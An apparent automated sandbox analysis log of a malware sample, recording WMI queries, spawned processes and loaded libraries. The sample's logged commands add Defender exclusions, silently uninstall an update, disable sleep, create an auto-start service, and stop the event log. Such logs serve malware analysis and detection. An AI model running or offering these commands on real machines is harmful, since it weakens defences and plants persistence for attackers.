              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Users\user\Desktop\gq83mrprwy.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: gq83mrprwy.exeReversingLabs: Detection: 63%
              Source: gq83mrprwy.exeVirustotal: Detection: 55%
              Source: C:\Users\user\Desktop\gq83mrprwy.exeFile read: C:\Users\user\Desktop\gq83mrprwy.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\gq83mrprwy.exe "C:\Users\user\Desktop\gq83mrprwy.exe"
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=1932,i,323240388522049765,3171702959307320635,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CENLNOGJ"
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CENLNOGJ" binpath= "C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe" start= "auto"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CENLNOGJ"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\explorer.exe explorer.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CENLNOGJ"Jump to behavior
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CENLNOGJ" binpath= "C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe" start= "auto"Jump to behavior
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CENLNOGJ"Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=1932,i,323240388522049765,3171702959307320635,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\Desktop\gq83mrprwy.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
